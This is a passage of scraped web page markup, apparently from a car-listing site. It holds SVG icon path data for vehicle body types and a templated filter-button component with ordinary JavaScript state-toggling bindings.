d="M3.53,6.49c.47-.54.88-1,1.51-1H7.56a4.08,4.08,0,0,1,1.77.62h0a.58.58,0,0,0-.18.4.27.27,0,0,0,0,.14A38.64,38.64,0,0,1,3.53,6.49Zm3,.58H6.06v.22h.48Zm3.39-.43a.16.16,0,0,0,0-.16.67.67,0,0,0-.35-.29.16.16,0,0,0-.17,0h0a.47.47,0,0,0-.15.33.16.16,0,0,0,.16.17h.11l.09.12a.11.11,0,0,0,.09,0l.07,0a.11.11,0,0,0,0-.15A.16.16,0,0,0,9.94,6.64Zm4.15,2.44-.14,0a3.75,3.75,0,0,1-1,.1h-.51a1.06,1.06,0,0,1-1.93,0h-6a1.08,1.08,0,0,1-1.74.29,1.09,1.09,0,0,1-.2-.29H2.31a.85.85,0,0,1-.87-.58v-.8l.05,0a.65.65,0,0,0,.21-.34l0-.48a.49.49,0,0,1,.2-.38l1.34-1-.17-.27.21-.07A4.44,4.44,0,0,1,4.94,5H7.58a5,5,0,0,1,1,.18A14.65,14.65,0,0,1,10.7,6.29c.17,0,1,.16,1.84.38,1.06.27,1.42.7,1.46.89ZM4.35,8.73a.76.76,0,1,0-.22.53A.75.75,0,0,0,4.35,8.73Zm7.88,0a.76.76,0,1,0-.22.53A.75.75,0,0,0,12.23,8.73Zm1.5.09V8.59h-.16a.11.11,0,0,1-.1.07h-.16a.12.12,0,0,1-.12-.12V8.41a.12.12,0,0,1,.12-.12h.16a.11.11,0,0,1,.1.07h.15l0-.57H13.5a.83.83,0,0,0-.38.1l-.32-.57h.5A3.43,3.43,0,0,0,12.45,7c-1-.25-1.83-.38-1.84-.38l-.06,0a15.39,15.39,0,0,0-2-1.07,4.65,4.65,0,0,0-.94-.17H4.94a4.17,4.17,0,0,0-1.34.16l.13.15-.63.8H2.64l-.52.38s0,0,0,0a3.08,3.08,0,0,1,.52-.06c0,.2-.29.53-.29.53H2v.08A.88.88,0,0,1,1.77,8v.59c0,.07.14.29.55.31v-.2A1.29,1.29,0,0,1,3.6,7.38h0a1.28,1.28,0,0,1,.91.38h0a1.28,1.28,0,0,1,.38.91v.21H10.2V8.66a1.29,1.29,0,0,1,1.28-1.28h0a1.28,1.28,0,0,1,.91.38h0a1.28,1.28,0,0,1,.38.91v.21H13A3.77,3.77,0,0,0,13.73,8.82ZM3.6,8.46A.27.27,0,0,0,3.6,9h.07a.27.27,0,0,0-.07-.53Zm1.72-.19v.28H9Zm6.17.19a.27.27,0,1,0,.27.27A.27.27,0,0,0,11.48,8.46Z"></path></symbol><symbol id="hybrid" viewBox="0 0 14.77 5.21"><path d="M9.57,6.13,3.71,6l-.12-.41A10.3,10.3,0,0,1,4.77,5.2,13.77,13.77,0,0,1,7.67,5a5.72,5.72,0,0,1,2.09.69h0a.56.56,0,0,0-.17.39A.32.32,0,0,0,9.57,6.13Zm.74,0a.14.14,0,0,0,0-.15A.59.59,0,0,0,10,5.77a.14.14,0,0,0-.15,0h0a.42.42,0,0,0-.13.29.14.14,0,0,0,.14.15H10l.08.11a.1.1,0,0,0,.08,0l.06,0a.1.1,0,0,0,0-.14A.14.14,0,0,0,10.31,6.18Zm-2.5.3H7.13v.2h.68ZM4.74,6.4H4.06v.2h.68Zm.63,1.55V8.2H10Zm9.14.86-.12,0a3.79,3.79,0,0,1-.89.07h-.32a1.25,1.25,0,0,1-2,.63h0a1.26,1.26,0,0,1-.4-.63H4.66a1.25,1.25,0,0,1-2.42,0H2a1.44,1.44,0,0,1-1-.45l0,0V7.31l0,0a.67.67,0,0,0,.2-.35c0-.12,0-.36,0-.59s0-.36,0-.47V5.73l.68-.08A12.23,12.23,0,0,1,7.68,4.51,7.86,7.86,0,0,1,11,5.84l.26,0c1.61.15,3.12.37,3.26,1ZM4.28,8.58a.84.84,0,1,0-.84.84A.84.84,0,0,0,4.28,8.58Zm8.54,0a.84.84,0,1,0-.84.84A.84.84,0,0,0,12.82,8.58Zm1.4-1.32h-.12a.91.91,0,0,0-.41.11l-.35-.62.82.07c-.23-.26-1.22-.49-2.94-.65l-.29,0-.06,0a7.68,7.68,0,0,0-3.2-1.3A12,12,0,0,0,2,5.93H2L1.54,6c0,.1,0,.21,0,.33H2v.19c0,.2-.29.36-.52.38v0a.85.85,0,0,1-.24.5v.86A1.19,1.19,0,0,0,2,8.6V8.32A1.44,1.44,0,0,1,3.45,6.89h0a1.43,1.43,0,0,1,1,.42h0a1.43,1.43,0,0,1,.42,1v.29h5.67V8.32A1.44,1.44,0,0,1,12,6.89h0a1.43,1.43,0,0,1,1,.42h0a1.43,1.43,0,0,1,.42,1v.29h.1a4,4,0,0,0,.71,0V8.48h-.31a.71.71,0,0,1,0-.29h.35V8h-.55a1.12,1.12,0,0,1,.11-.39h.43ZM12,8.25a.32.32,0,1,0,.33.33A.32.32,0,0,0,12,8.25Zm-8.54,0a.32.32,0,1,0,.33.33A.32.32,0,0,0,3.45,8.25Z"></path></symbol><symbol id="luxury" viewBox="0 0 15.5 5"><path d="M13.06,8.63a.29.29,0,1,1-.29-.29A.29.29,0,0,1,13.06,8.63ZM8.76,6.86H8v.21h.73Zm-3.56,0H4.47v.21H5.2ZM3,8.34a.29.29,0,1,0,.29.29A.29.29,0,0,0,3,8.34Zm1.91-.17v.27h6.17Zm5.9-1.7a.15.15,0,0,0,0-.16A.63.63,0,0,0,10.49,6a.15.15,0,0,0-.16,0h0a.45.45,0,0,0-.14.31.15.15,0,0,0,.15.16h.1l.08.12a.11.11,0,0,0,.09,0l.06,0a.1.1,0,0,0,0-.14A.15.15,0,0,0,10.82,6.47ZM15.35,9l-.13,0a3.86,3.86,0,0,1-1,.1H13.8a1.14,1.14,0,0,1-2.05,0H4A1.14,1.14,0,0,1,2,9.12H1.67A2.23,2.23,0,0,1,1,9H.37V8.73L.2,8.62l-.07,0V7.51l0,0a.94.94,0,0,0,.13-.4L.32,6l1.52-.1.05,0a9.21,9.21,0,0,1,2.93-1H8.29A5.1,5.1,0,0,1,9.35,5a15.11,15.11,0,0,1,2.16,1.12,19.38,19.38,0,0,1,2.25.4c1.09.28,1.45.71,1.5.9ZM3.81,8.63A.79.79,0,1,0,3,9.43.79.79,0,0,0,3.81,8.63Zm9.76,0a.79.79,0,1,0-.79.79A.79.79,0,0,0,13.57,8.63ZM15,8.74V8.49h-.13a.11.11,0,0,1-.09.07h-.16a.11.11,0,0,1-.11-.11V8.33a.11.11,0,0,1,.11-.11h.16a.11.11,0,0,1,.09.07H15l0-.54h-.25a.79.79,0,0,0-.36.09L14,7.3h.7a3.09,3.09,0,0,0-1.07-.46,19.3,19.3,0,0,0-2.24-.39l-.07,0A15.88,15.88,0,0,0,9.25,5.32a4.8,4.8,0,0,0-1-.18H4.82A9.09,9.09,0,0,0,2,6.12l-.14.05L.63,6.26l0,.46h.63v.2c0,.22-.35.42-.61.42H.55a1.58,1.58,0,0,1-.1.26V8.4a2.91,2.91,0,0,0,1.23.4V8.56A1.35,1.35,0,0,1,3,7.22H3A1.34,1.34,0,0,1,4,7.61H4a1.34,1.34,0,0,1,.39.95V8.8h7.07V8.56a1.34,1.34,0,0,1,.39-.95h0a1.34,1.34,0,0,1,.95-.39h0a1.34,1.34,0,0,1,.95.39h0a1.34,1.34,0,0,1,.39.95V8.8h.07A3.87,3.87,0,0,0,15,8.74ZM2.95,6.3a3.11,3.11,0,0,0,1.15.14h.34l.29-1.11A5.28,5.28,0,0,0,2.95,6.3ZM5,5.29H5l-.3,1.13H7.32V5.29Zm5,1.09A.6.6,0,0,1,10.21,6,4.47,4.47,0,0,0,8,5.29H7.54V6.43H10A.32.32,0,0,1,10,6.38Z"></path></symbol><symbol id="minivan" viewBox="0 0 14.77 5.21"><path d="M8.41,4.54a3.57,3.57,0,0,1,1,.17A16.3,16.3,0,0,1,12,6.12l-.49.18-.13,0-1.08,0c-.05-.09-.13-.18-.16-.23a.83.83,0,0,0-.44-.36.32.32,0,0,0-.33.07h0a.63.63,0,0,0-.2.44.32.32,0,0,0,0,0L4,6.07l-1.5-.31L3,4.7A10.35,10.35,0,0,1,4.7,4.54C6,4.54,7.08,4.52,8.41,4.54ZM12,8.14a.3.3,0,1,0,.3.3A.3.3,0,0,0,12,8.14Zm-8.54,0a.3.3,0,1,0,.3.3A.3.3,0,0,0,3.42,8.14ZM7.75,6.48H7.27V6.7h.48ZM4.94,6.37H4.46v.22h.48Zm5-.07a.16.16,0,0,0,0-.16.67.67,0,0,0-.35-.29.16.16,0,0,0-.17,0h0a.47.47,0,0,0-.15.33.16.16,0,0,0,.16.17h.11l.09.12a.11.11,0,0,0,.09,0l.07,0a.11.11,0,0,0,0-.15A.16.16,0,0,0,10,6.3Zm4.78,2.17,0,.36-.22.05a3.08,3.08,0,0,1-.89.08H13a1.19,1.19,0,0,1-1.92.33h0A1.2,1.2,0,0,1,10.89,9H4.49a1.19,1.19,0,0,1-1.92.33h0A1.2,1.2,0,0,1,2.35,9H2v0a1.13,1.13,0,0,1-.92-.57V7.26l0,0a1,1,0,0,0,.14-.42L1.28,6,2,4.73l-.06-.38.15,0A14.28,14.28,0,0,1,4.7,4H5.79C6.7,4,7.72,4,8.44,4a7.51,7.51,0,0,1,3.51,1.44l.54.33.33.09c.81.2,1.82.46,2,1.12V7Zm-10.47,0a.84.84,0,1,0-.84.84A.84.84,0,0,0,4.26,8.45Zm8.57,0a.87.87,0,0,0-.25-.61h0a.87.87,0,1,0-1.23,1.23h0a.87.87,0,0,0,1.48-.61Zm1.61-1.24c-.34,0-.66,0-.75,0h0a.83.83,0,0,0-.38.06L13,6.57l1.28.21a4.15,4.15,0,0,0-1.54-.61l-.36-.09,0,0-.56-.35A7.27,7.27,0,0,0,8.42,4.32c-.7,0-1.72,0-2.63,0H4.7a13.42,13.42,0,0,0-2.4.29l0,.17-.7,1.33h.72v.27c0,.29-.46.55-.8.55a1.48,1.48,0,0,1-.14.42v.91A.81.81,0,0,0,2,8.61V8.37A1.42,1.42,0,0,1,3.42,7h0a1.41,1.41,0,0,1,1,.42h0a1.41,1.41,0,0,1,.42,1v.26h5.71V8.37a1.41,1.41,0,0,1,.42-1h0A1.41,1.41,0,0,1,12,7h0a1.41,1.41,0,0,1,1,.42h0a1.41,1.41,0,0,1,.42,1v.26h.27a2.92,2.92,0,0,0,.76-.06V8.3h-.21a.11.11,0,0,1-.1.07h-.16a.12.12,0,0,1-.12-.12V8.13A.12.12,0,0,1,13.93,8h.16a.11.11,0,0,1,.1.07h.22ZM5.13,8v.28h5.22Z"></path></symbol><symbol id="sedan" viewBox="0 0 15.5 5"><path d="M4.51,6.59A3.28,3.28,0,0,1,3.3,6.45a4.46,4.46,0,0,1,2.2-1.06H7.33a4.72,4.72,0,0,1,2.34.72.63.63,0,0,0-.19.43.33.33,0,0,0,0,.06ZM8.14,7H7.37v.22h.77ZM4.72,7H4v.22h.77Zm.66,1.38v.28H10.6Zm4.94-1.79a.16.16,0,0,0,0-.16A.67.67,0,0,0,10,6.17a.16.16,0,0,0-.17,0h0a.47.47,0,0,0-.15.33.16.16,0,0,0,.16.17h.11l.09.12a.11.11,0,0,0,.09,0l.07,0a.11.11,0,0,0,0-.15A.16.16,0,0,0,10.32,6.63Zm-6.95,2a.3.3,0,1,0,.3.3A.3.3,0,0,0,3.37,8.6Zm11.72.68-.14,0a4.07,4.07,0,0,1-1.08.1h-.42a1.2,1.2,0,0,1-.22.33h0a1.17,1.17,0,0,1-1.92-.33H4.44a1.2,1.2,0,0,1-.22.33h0A1.17,1.17,0,0,1,2.3,9.42H2a2.35,2.35,0,0,1-.74-.14H.58V9L.4,8.9l-.08,0V7.73l0,0a1,1,0,0,0,.14-.42l0-1.17L2.13,6l.06,0A9.72,9.72,0,0,1,5.27,4.89H7.65a5.37,5.37,0,0,1,1.11.2A16,16,0,0,1,11,6.28a20.51,20.51,0,0,1,2.37.42c1.15.29,1.53.75,1.58,1ZM4.21,8.91a.84.84,0,1,0-.84.84A.84.84,0,0,0,4.21,8.91Zm9,0a.84.84,0,1,0-.84.84A.84.84,0,0,0,13.21,8.91ZM14.74,9V8.76h-.14a.11.11,0,0,1-.1.07h-.16a.12.12,0,0,1-.12-.12V8.59a.12.12,0,0,1,.12-.12h.16a.11.11,0,0,1,.1.07h.12l0-.57h-.26a.83.83,0,0,0-.38.1l-.32-.57h.74A3.25,3.25,0,0,0,13.33,7,20.37,20.37,0,0,0,11,6.6l-.07,0A16.79,16.79,0,0,0,8.66,5.41a5.07,5.07,0,0,0-1-.19H5.27a9.59,9.59,0,0,0-2.94,1l-.15.06L.85,6.41l0,.48H1.5v.22c0,.23-.37.44-.64.44H.77a1.66,1.66,0,0,1-.11.27v.85A3,3,0,0,0,2,9.09V8.83a1.41,1.41,0,0,1,.42-1h0a1.41,1.41,0,0,1,2,0h0a1.41,1.41,0,0,1,.42,1v.26H11V8.83a1.41,1.41,0,0,1,.42-1h0a1.41,1.41,0,0,1,1-.42h0a1.41,1.41,0,0,1,1,.42h0a1.41,1.41,0,0,1,.42,1v.26h.08A4.09,4.09,0,0,0,14.74,9ZM12.37,8.6a.3.3,0,1,0,.3.3A.3.3,0,0,0,12.37,8.6Z"></path></symbol><symbol id="sport" viewBox="0 0 15.5 5"><path d="M5.83,5.55l.07.84L4.58,6.1c.53-.35.62-.54,1.24-.54Zm.33,0H8.05a7.68,7.68,0,0,1,1.31.53l0,0h0a.63.63,0,0,0-.19.36H6.24Zm9,1.75,0-.51-.08,0c-.49-.29-1.92-.48-4.36-.57h0A10.65,10.65,0,0,0,8.2,5L8.07,5H5.32a10.23,10.23,0,0,0-2.4.78l-.5.2L1.1,6l-.77-.1L.5,6.5l-.15.63a.87.87,0,0,1-.23.45l0,0v.9l.07,0A6.57,6.57,0,0,0,2,9.24H2l.13,0,.09,0,.09,0h0l.11,0a1.2,1.2,0,0,0,1.92,0h7.46a1.2,1.2,0,0,0,.35.32h0a1.17,1.17,0,0,0,1.56-.37A4.61,4.61,0,0,0,14.89,9L15,9V8.88a.66.66,0,0,0-.08-.27l0,0a1.19,1.19,0,0,0,.44-1V7.48ZM3.41,9.48a.84.84,0,1,1,.84-.84A.84.84,0,0,1,3.41,9.48Zm9.34,0a.84.84,0,1,1,.84-.84A.84.84,0,0,1,12.75,9.48Zm1.92-1.15-.08.08-.05.05v.08a.67.67,0,0,0,.07.21v0a4,4,0,0,1-.45.13V8.68a1.44,1.44,0,0,0-.37-1.05h0a1.42,1.42,0,0,0-1-.36,1.42,1.42,0,0,0-1,.37h0a1.44,1.44,0,0,0-.37,1.05V9H4.83V8.68a1.44,1.44,0,0,0-.37-1.05h0a1.42,1.42,0,0,0-1-.36,1.42,1.42,0,0,0-1,.37h0A1.44,1.44,0,0,0,2,8.68V8.9A7,7,0,0,1,.41,8.35v-.6a1,1,0,0,0,.27-.58l.16-.68L.79,6.3l.29,0,1.37,0h.05L3,6.09a11.55,11.55,0,0,1,2.27-.76H8.1a10.47,10.47,0,0,1,2.42,1.15l0,0h.1A14.1,14.1,0,0,1,14.79,7l0,.47.19.16A.84.84,0,0,1,14.67,8.33Zm-11.26,0a.3.3,0,1,0,.3.3A.3.3,0,0,0,3.41,8.33ZM7.1,6.76H6.33V7H7.1ZM5.38,8.4v.28H10.9Zm7.37-.06a.3.3,0,1,0,.3.3A.3.3,0,0,0,12.75,8.33ZM10,6.64a.16.16,0,0,0,0-.16.67.67,0,0,0-.35-.29.16.16,0,0,0-.17,0h0a.47.47,0,0,0-.15.33.16.16,0,0,0,.16.17h.11l.09.12a.11.11,0,0,0,.09,0l.07,0a.11.11,0,0,0,0-.15A.16.16,0,0,0,10,6.64Z"></path></symbol><symbol id="suv" viewBox="0 0 15.5 5"><path d="M6.52,3.95H8.09a3.18,3.18,0,0,1,1.64.76.34.34,0,0,0-.14.08h0a1.18,1.18,0,0,0-.2.66H6.52ZM2.3,5.46H5.9V3.95H4.62A15.4,15.4,0,0,0,3,4ZM12.5,8a.37.37,0,1,0,.36.37A.37.37,0,0,0,12.5,8ZM3.93,8a.37.37,0,1,0,.36.37A.36.36,0,0,0,3.93,8ZM8,5.75H7.23V6H8Zm7.2,1.76v.63a.4.4,0,0,1-.14.37,1.76,1.76,0,0,1-1,.2h-.25a1.41,1.41,0,0,1-2.27.71h0a1.41,1.41,0,0,1-.45-.71H5.29a1.41,1.41,0,0,1-2.72,0H2.32A3.72,3.72,0,0,1,.71,8L.65,8v-1l.05,0A.73.73,0,0,0,.92,6.5V6.22c0-.19,0-.41,0-.6A.67.67,0,0,1,1.3,5.2a3.49,3.49,0,0,1,.35-.68,3.35,3.35,0,0,0,.18-.33l0-.09L1.9,4V4l0-.29.28-.06a6.69,6.69,0,0,1,1.72-.19H8.11a3.72,3.72,0,0,1,2.14,1,8.85,8.85,0,0,0,.91.67l.62,0c1.52.06,2.9.17,3.06.84L15,7.15A.46.46,0,0,1,15.2,7.51ZM4.87,8.36a.94.94,0,1,0-.94.94A.94.94,0,0,0,4.87,8.36Zm8.57,0a.94.94,0,1,0-.94.94A.94.94,0,0,0,13.44,8.36Zm1.43-.85s-.08-.1-.11-.12l-.08,0V7.25h-.44v-1h.3l0-.11c-.11-.47-1.89-.54-2.74-.57l-.68,0-.07,0a8.9,8.9,0,0,1-1-.72,3.41,3.41,0,0,0-1.94-1H3.85A6.29,6.29,0,0,0,2.22,4a.37.37,0,0,1,0,.28l0,.09a3.6,3.6,0,0,1-.21.36,2.79,2.79,0,0,0-.33.66l0,.09-.09,0a.47.47,0,0,0-.21.19H2v.27c0,.29-.44.54-.78.55v0A1,1,0,0,1,1,7.07V7.8a3.34,3.34,0,0,0,1.35.57v-.3A1.61,1.61,0,0,1,3.93,6.46h0a1.6,1.6,0,0,1,1.14.47h0a1.6,1.6,0,0,1,.47,1.14v.32h5.35V8.07A1.61,1.61,0,0,1,12.5,6.46h0a1.6,1.6,0,0,1,1.14.47h0a1.6,1.6,0,0,1,.47,1.14v.32a1.51,1.51,0,0,0,.76-.14.57.57,0,0,1,0-.1ZM9.71,4.91h0a1.15,1.15,0,0,0-.15.55.16.16,0,0,0,.16.17h.37c.39,0-.07-.71-.21-.76A.16.16,0,0,0,9.71,4.91ZM6.47,7.65v.28h4Z"></path></symbol><symbol id="truck" viewBox="0 0 15.5 5"><path d="M6.09,4.72H9.24a2.7,2.7,0,0,1,1.39.65.29.29,0,0,0-.12.07h0a1,1,0,0,0-.17.56H5.91ZM9.16,6.25H8.51v.19h.65Zm1.45-.71h0a1,1,0,0,0-.12.47.14.14,0,0,0,.14.14h.31c.33,0-.06-.6-.18-.64A.14.14,0,0,0,10.61,5.54ZM5.22,7.86V8.1H11Zm7.76.3a.31.31,0,1,0,.31.31A.31.31,0,0,0,13,8.15Zm2.29-.31v.44a.34.34,0,0,1-.12.32,1.49,1.49,0,0,1-.81.17h-.21a1.19,1.19,0,0,1-1.92.6h0a1.2,1.2,0,0,1-.38-.6H4.23a1.19,1.19,0,0,1-2.3,0H1.67a4.54,4.54,0,0,1-1.39-.3l-.09,0V7.26l0,0a.63.63,0,0,0,.19-.33V6.65c0-.16,0-.35,0-.51a.59.59,0,0,1,.36-.39H5.13l.22-1.1a.42.42,0,0,1,.42-.34H9.25a3.15,3.15,0,0,1,1.81.88,7.52,7.52,0,0,0,.77.57l.53,0c1.29,0,2.46.14,2.59.71l.13,1A.39.39,0,0,1,15.27,7.84Zm-11.4.62a.8.8,0,1,0-.8.8A.8.8,0,0,0,3.87,8.46Zm.8-.25a1.6,1.6,0,1,0-3.2,0v.26l.24,0V8.22A1.37,1.37,0,0,1,3.07,6.85h0a1.36,1.36,0,0,1,1,.4H4a1.36,1.36,0,0,1,.4,1v.27h.24Zm6.52,0a1.78,1.78,0,0,1,3.34-.87V6.64h.16v-.1c-.09-.4-1.6-.45-2.33-.48l-.58,0-.06,0a7.52,7.52,0,0,1-.83-.61,2.89,2.89,0,0,0-1.65-.82H5.76a.14.14,0,0,0-.14.11L5.36,6H.89a.42.42,0,0,0-.16.15h.63v.23c0,.24-.38.46-.66.46v0a.81.81,0,0,1-.23.48v.87a5.12,5.12,0,0,0,.81.21V8.22a1.79,1.79,0,1,1,3.58,0v.27h6.33Zm2.58.25a.8.8,0,1,0-.8.8A.8.8,0,0,0,13.78,8.46Zm.8-.25a1.6,1.6,0,1,0-3.2,0v.27h.24V8.22a1.36,1.36,0,0,1,.4-1h0a1.36,1.36,0,0,1,1-.4h0a1.36,1.36,0,0,1,1,.4h0a1.36,1.36,0,0,1,.4,1v.27l.24,0ZM15,7.84s-.07-.09-.09-.1l0,0h-.16a1.76,1.76,0,0,1,.08.5v.23A.73.73,0,0,0,15,8.37a.48.48,0,0,1,0-.08ZM3.07,8.15a.31.31,0,1,0,.31.31A.31.31,0,0,0,3.07,8.15Zm3.54-1.9H6v.19h.65Z"></path></symbol><symbol id="wagon" viewBox="0 0 15.5 5"><path d="M3.38,6.59a3.28,3.28,0,0,1-1.22-.14c1.5-1.1,1.32-1.06,3.36-1.06H7.58a4.09,4.09,0,0,1,1.2.18,6.63,6.63,0,0,1,1.09.51l0,0h0a.63.63,0,0,0-.2.44.33.33,0,0,0,0,.06ZM8.3,7H7.53v.22H8.3ZM5.11,7H4.34v.22h.77Zm.44,1.38v.28h5.22Zm4.94-1.79a.16.16,0,0,0,0-.16.67.67,0,0,0-.35-.29.16.16,0,0,0-.17,0h0a.47.47,0,0,0-.15.33.16.16,0,0,0,.16.17h.11l.09.12a.11.11,0,0,0,.09,0l.07,0a.11.11,0,0,0,0-.15A.16.16,0,0,0,10.48,6.63Zm-6.73,2a.3.3,0,1,0,.3.3A.3.3,0,0,0,3.75,8.6Zm11.5.68-.14,0a4.06,4.06,0,0,1-1.08.1h-.42a1.2,1.2,0,0,1-.22.33h0a1.17,1.17,0,0,1-1.92-.33H4.82a1.2,1.2,0,0,1-.22.33h0a1.17,1.17,0,0,1-1.92-.33H1.79a2.35,2.35,0,0,1-.74-.14H.42V9L.23,8.9l-.08,0V7.73l0,0a1,1,0,0,0,.14-.42l0-.78,1.47-1,0-.33.15,0a14.66,14.66,0,0,1,2.63-.22H7.81a5.41,5.41,0,0,1,1.11.2A16,16,0,0,1,11.2,6.28a20.48,20.48,0,0,1,2.37.42c1.15.29,1.53.75,1.58,1ZM4.59,8.91a.84.84,0,1,0-.84.84A.84.84,0,0,0,4.59,8.91Zm8.79,0a.84.84,0,1,0-.84.84A.84.84,0,0,0,13.38,8.91ZM14.9,9V8.76h-.14a.11.11,0,0,1-.1.07h-.16a.12.12,0,0,1-.12-.12V8.59a.12.12,0,0,1,.12-.12h.16a.11.11,0,0,1,.1.07h.13l0-.57h-.26a.83.83,0,0,0-.38.1l-.32-.57h.74A3.26,3.26,0,0,0,13.49,7a20.37,20.37,0,0,0-2.36-.41l-.07,0A16.81,16.81,0,0,0,8.83,5.41a5.08,5.08,0,0,0-1-.19H4.57a15.18,15.18,0,0,0-2.4.18l0,.22-1.51,1v.22h.55v.22c0,.23-.36.43-.63.44a1.67,1.67,0,0,1-.11.27v.85a2.92,2.92,0,0,0,1.34.42h.51V8.84a1.41,1.41,0,0,1,.42-1h0a1.41,1.41,0,0,1,1-.42h0a1.41,1.41,0,0,1,1,.42h0a1.41,1.41,0,0,1,.42,1v.26h6V8.84a1.41,1.41,0,0,1,.42-1h0a1.41,1.41,0,0,1,1-.42h0a1.41,1.41,0,0,1,1,.42h0a1.41,1.41,0,0,1,.42,1v.26H14A4.07,4.07,0,0,0,14.9,9ZM12.54,8.6a.3.3,0,1,0,.3.3A.3.3,0,0,0,12.54,8.6Z"></path></symbol><symbol id="cargo" viewBox="50 65 400 100"><path d="M343.7,216.3c-0.1,1.6,0.3,3.1,1.1,4.4h-7.6c-17.8,0-51.6-13.8-51.6-13.8v-46.6h25.2c2.1,0,3.9,0.7,5.6,2.1c6.6,5.7,13.2,12.1,18.8,17.2c5.7,5.2,12.3,11.5,19.1,17.2c-2,0.1-3.9,0.9-5.5,2.4l0,0C345.4,202.6,343.9,211.6,343.7,216.3zM356.1,201.4c-1.5-0.5-3.1-0.2-4.3,0.9l-0.1,0.1c-2.4,2.3-3.6,10.8-3.7,14.1c0,1.2,0.3,2.2,1.2,3c0.8,0.8,1.8,1.3,3,1.3h9.4C371.6,220.8,359.8,202.7,356.1,201.4z M280.7,226.3h19.6v-5.7h-19.6V226.3z M249.4,221.2H269v-5.7h-19.6V221.2z M90.4,225.1h66.3v-5.7H90.4V225.1zM446.9,263.8l-0.2,14.6c-0.1,6.1-4.5,11.3-10.6,12.4l-2,0.3c-3.5,0.5-13.6,0.7-21.3,0.7h-2.3v0h-4.3h-2.4c-1.4,5.1-4.2,9.7-7.8,13.4h0c-5.5,5.5-13.2,9-21.7,9c-8.5,0-16.1-3.4-21.7-9c-3.7-3.7-6.4-8.3-7.8-13.4h-2.4h-4.3v0H165.4v0h-4.3h-2.4c-1.4,5.1-4.2,9.7-7.8,13.4h0c-5.5,5.5-13.2,9-21.7,9c-8.5,0-16.1-3.4-21.7-9c-3.7-3.7-6.4-8.3-7.8-13.4h-2.4H93v0H81.3c-0.4,0-0.7,0-1.1,0c-10.1,0-16.7-3.9-20.5-7.2c-4.3-3.8-6.1-7.6-6.2-8l-0.4-1.7v-26.5l0.6-1c0.1-0.1,0.9-1.5,1.8-3.6c1.1-2.7,1.7-5.2,1.7-7.2c0.1-2,0.2-7.1,0.4-14.1c0.5-21.3,1.3-57,2.9-68.5l1.2-7.5h257.4l1.2,1c6.4,5.3,14,12.2,21.9,19.5c12.6,11.5,25.6,23.3,33.7,28.4c6.5,2.1,59.6,19.6,62.2,31.3c3.4,12.3,3.6,14.4,3.3,26.5C444.9,255.6,446.9,259.5,446.9,263.8zM147.9,283.6c0-10.3-8.4-18.7-18.7-18.7c-10.3,0-18.7,8.4-18.7,18.7c0,10.3,8.4,18.7,18.7,18.7C139.5,302.3,147.9,293.9,147.9,283.6z M393,283.6c0-10.3-8.4-18.7-18.7-18.7c-10.3,0-18.7,8.4-18.7,18.7c0,10.3,8.4,18.7,18.7,18.7C384.6,302.3,393,293.9,393,283.6z M438.4,263.7c0-1.8-1-3.3-2.6-4l-2.7-1.1l-0.2-3.1c0.2-6.2,0.3-9.8,0-13c-10-5.4-23.7-13.1-26-15.4c-0.8-0.8-1.2-6-1.2-11.6c-12.2-5.2-25.9-10.2-32.7-12.1l-1.1-0.5c-8.8-5.3-22.3-17.7-35.4-29.6c-7.4-6.8-14.4-13.2-20.4-18.2l-247.1,0.2c-0.5,3.5-0.9,9.6-1.3,16.9h9.9v50.9c-0.2,5.1-5.6,9.7-11.7,12.2c0,0.6,0,1.2-0.1,1.5c0,2.9-0.8,6.4-2.4,10.2c-0.6,1.5-1.3,2.8-1.7,3.6v23.2c0.5,0.9,1.7,2.6,3.7,4.4c4.1,3.6,9.5,5.3,15.9,5.1H93v-0.9c0-10,4.1-19,10.6-25.6c6.6-6.6,15.6-10.6,25.6-10.6h0c9.9,0,19,4.1,25.5,10.6l0,0l0,0c6.6,6.6,10.6,15.6,10.6,25.5v0.9h172.7v-0.9c0-10,4.1-19,10.6-25.6c6.6-6.6,15.6-10.6,25.6-10.6h0c9.9,0,19,4.1,25.5,10.6l0,0l0,0c6.6,6.6,10.6,15.6,10.6,25.5v0.9h2.3c7.4,0,17.3-0.3,20.2-0.7l1.6-0.3c2-0.4,3.5-2.1,3.5-4.1L438.4,263.7z M374.3,275.8c-4.3,0-7.8,3.5-7.8,7.8c0,4.3,3.5,7.8,7.8,7.8c4.3,0,7.8-3.5,7.8-7.8C382.1,279.3,378.6,275.8,374.3,275.8z M129.2,275.8c-4.3,0-7.8,3.5-7.8,7.8c0,4.3,3.5,7.8,7.8,7.8c4.3,0,7.8-3.5,7.8-7.8C137,279.3,133.5,275.8,129.2,275.8z"></path></symbol></svg><div class="sc-kMBllD ilbRAa" data-jzlbind-list="h('filtersState.availableFilters.bodyTypes.items')"><script type="x-tmpl-mustache"><div class="sc-hCbubC kiEKbJ sc-hgzKov WquWS" data-jzlbind-class="&#x27;sc-hCbubC kiEKbJ &#x27; + ( (h(&#x27;filtersState.selectedFilters.bodyTypes&#x27;) || []) .some(function(x) { return x() === &#x27;{{value}}&#x27;; }) ? &#x27;selected&#x27; : &#x27;&#x27; )"><div class="sc-gCwZxT lneiwa buttonComponent plain sc-kIWQTW oMVMP" data-jzlbind-class="&#x27;sc-gCwZxT lneiwa &#x27; + ( (h(&#x27;filtersState.selectedFilters.bodyTypes&#x27;) || []).some(function(x) { return x() === &#x27;{{value}}&#x27;; }) ? &quot;buttonComponent checked &quot; : &quot;buttonComponent plain &quot; )" role="button" tabindex="0" data-jzlbind-tap=" jzlMergeState({ filtersState: { selectedFilters: { bodyTypes: h(&#x27;filtersState.selectedFilters&#x27;) != null &amp;&amp; Object.keys(h(&#x27;filtersState.selectedFilters&#x27;)).includes(&#x27;bodyTypes&#x27;) ? ( h(&#x27;filtersState.selectedFilters.bodyTypes&#x27;).some(function(x) { return x() === &#x27;{{value}}&#x27;; }) ? h(&#x27;filtersState.selectedFilters.bodyTypes&#x27;).filter(function(x) { return x() !== &#x27;{{value}}&#x27;; }) : h(&#x27;filtersState.selectedFilters.bodyTypes&#x27;).concat([&#x27;{{value}}&#x27;]) ) : [&#x27;{{value}}&#x27;] } }, }) "><div class="sc-SFOxd hOrsRw"><div class="sc-jOBXIr gwtwWP"><svg width="100" height="100"><use xlink:href="#{{icon}}" class="sc-jOVcOr gCDYhV"></use></svg></div></div><div class="sc-dzOgQY jklYAn">{{label}}</div></div></div></script></div></div></div><div class="sc-gjAXCV kqIHnM collapsed sc-cSYcjD fVHGdp" data-jzlbind-class="'sc-gjAXCV kqIHnM ' + (h('filtersSearchState.expanded').map(function(x) { return x(); }).includes(&quot;drivetrains&quot;) ? 'expanded' : 